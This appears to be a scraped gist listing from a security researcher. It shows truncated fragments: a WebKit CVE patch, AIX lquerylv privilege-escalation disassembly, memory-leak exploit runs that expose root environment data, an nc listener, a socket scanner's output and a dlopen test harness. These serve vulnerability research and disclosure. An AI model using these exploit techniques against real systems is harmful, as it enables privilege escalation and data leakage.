Tim Brown timb-machine
timb-machine
/ CVE-2010-4577 & CVE-2010-0046 WebKit type confusion
Created
September 4, 2017 04:13
CVE-2010-4577 & CVE-2010-0046 WebKit type confusion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2010-4577 | |
| Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685 | |
| Bug report inaccessible but changeset: | |
| CSSParserValueList* args = val->function->args.get(); | |
| 3632 3632 if (args && args->size() == 1) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING || args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| BINFILENAME="${1}" | |
| tempfilename="`tempfile`" | |
| echo "set pagination off" > "${tempfilename}" | |
| # | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@" | |
| # | grep "@plt" | cut -f 2 -d "<" | cut -f 1 -d "@" | |
| objdump -D "${BINFILENAME}" | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@" | sort | uniq | while read line^M | |
| do |
timb-machine
/ CVE-2014-8904 AIX lquerylv EoP
Created
September 4, 2017 04:01
CVE-2014-8904 AIX lquerylv EoP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .text:10000354 .using unk_30000BB4, %r31 | |
| .text:10000354 stw %r3, 0x110+var_28(%sp) | |
| .text:10000358 addi %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV" | |
| .text:1000035C bl .getenv | |
| .text:10000360 lwz %rtoc, 0x110+saved_toc(%sp) | |
| .text:10000364 lwz %r29, off_30001568 # dword_300015E4 | |
| .text:10000368 .using dword_300015E4, %r29 | |
| .text:10000368 cmpwi %r3, 0 | |
| .text:1000036C bne loc_100006D0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FreeBSD 9.2-RC1: | |
| $ nc -n -vv -l -p 9090 | hexdump -C | |
| listening on [any] 9090 ... | |
| connect to [192.168.x.y] from (UNKNOWN) [192.168.124.194] 52680 | |
| 00000000 68 65 6c 6c 6f 0a 00 00 00 00 00 00 00 00 00 00 |hello...........| | |
| sent 0, rcvd 30 | |
| 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |..............| | |
| 0000001e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ sudo getcap `which ping` | |
| sudo getcap `which ping` | |
| [sudo] password for xx: | |
| /bin/ping = cap_net_raw+ep |
timb-machine
/ UNIXSocketScanner.pl example
Created
September 4, 2017 03:43
UNIXSocketScanner.pl example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ find / -type s | ./UNIXSocketScanner.pl -x 5 -p ./probes -n /usr/share/nmap/nmap-service-probes | |
| ... | |
| /tmp/akonadi-xxx.HoHuFd/mysql.socket | |
| + matches nmap-response-mysql | |
| + matches nmap-probe-NULL | |
| /tmp/akonadi-xxx.HoHuFd/akonadiserver.socket | |
| /tmp/ksocket-xxx/klauncherMT5682.slave-socket | |
| /tmp/ksocket-xxx/kio_http_cache_cleaner | |
| /tmp/ksocket-xxx/kdeinit4__0 | |
| /tmp/.ICE-unix/5725 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ./sploit 2000 $$ | |
| maximumleak: 2000 | |
| target: 14876824 | |
| ... ...........n .......bash.......4.....Sq...NQ...@..../usr/lib/libiconv.a.shr4.o.....4.....R........> ..../usr/lib/libi18n.a.shr.o.......0.....R....-u.RQ(..#4/usr/lib/nls/loc/en_US.....4.....Q.....>..f....(/usr/lib/libcrypt.a.shr.o......0.....f.......5p...../usr/lib/libdl.a.shr.o.....8...........P.e.0..HV/usr/lib/libcurses.a.shr42.o.utd...<.....M.......)....?./usr/lib/libpthreads.a.shr_xpg5.o......<.....Q....1_.$....! /usr/lib/libpthreads.a.shr_comm.o.ip.............=...x....eh/usr/lib/threads/libc.a.shr.o...rc.teboot.d........2.......S.(..rc.trustedboot.............3.......r. ..rc.wpars...........4......... ..resolv.conf........5......... ..route.....[`.......6.......-....rpc........7......... ..rpc.pcnfsd.c.......8.......D....rpm........9......... ..rsvpd.conf.........:......... ..screenrc...........;.......P. ..securetcpip........<......... ..security...........=.......v. ..sendmail.cf........>......... ..services...........?........ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ id | |
| uid=208(tmb) gid=1(staff) | |
| $ ./sploit 1000000 -1 | |
| maxiumumleak: 1000000 | |
| target: 17760424 | |
| $031097N 04j0a06000000000I404d0Qa109>f086f0801(0000:/05d01005=9dfff0xf6f00deh0000/usr/java5/binLC_ALL=CLC__FASTMSG=trueLOGNAME=rootLOCPATH=/usr/lib/nls/locODMPATH=/etc/objrepos:LDR_CNTRL=MAXDATA=0x80000000USER=rootAUTHSTATE=compatSHELL=/usr/bin/kshODMDIR=/etc/objreposHOME=/TERM=dumbPWD=/TZ=GMT0BSTNLSPATH=/usr/lib/nls/msg/%L/%N:/usr/lib/nls/msg/%L/%N.catLIBPATH=/usr/java14/jre/bin:/usr/java14/jre/bin/classic:/usr/java5/jre/bin:/usr/java5/jre/bin/classic: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| On Linux: | |
| $ date && touch foo && chmod u+xs foo && sudo chown 0:0 foo && ls -l foo && date | |
| Sun 26 Apr 15:10:58 BST 2015 | |
| -rwxr--r-- 1 root root 0 Apr 26 15:10 foo | |
| Sun 26 Apr 15:10:58 BST 2015 | |
| On other OS (iOS in this case): | |
| $ date && touch foo && chmod u+xs foo && sudo chown 0:0 foo && ls -l foo && date |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <dlfcn.h> | |
| #include <stdio.h> | |
| int main(int argc, char **argv) { | |
| void *libraryhandle; | |
| int (*functionpointer)(void *, void *, void *, void *, void *, void *, void *, void *, void *); | |
| int functionresult; | |
| libraryhandle = dlopen(argv[1], RTLD_NOW); | |
| functionpointer = dlsym(libraryhandle, argv[2]); | |
| functionresult = functionpointer(argv[3] ? argv[3] : NULL, argv[4] ? argv[4] : NULL, argv[5] ? argv[5] : NULL, argv[6] ? argv[6] : NULL, argv[7] ? argv[7] : NULL, argv[8] ? argv[8] : NULL, argv[9] ? argv[9] : NULL, argv[10] ? argv[10] : NULL, argv[11] ? argv[11] : NULL); |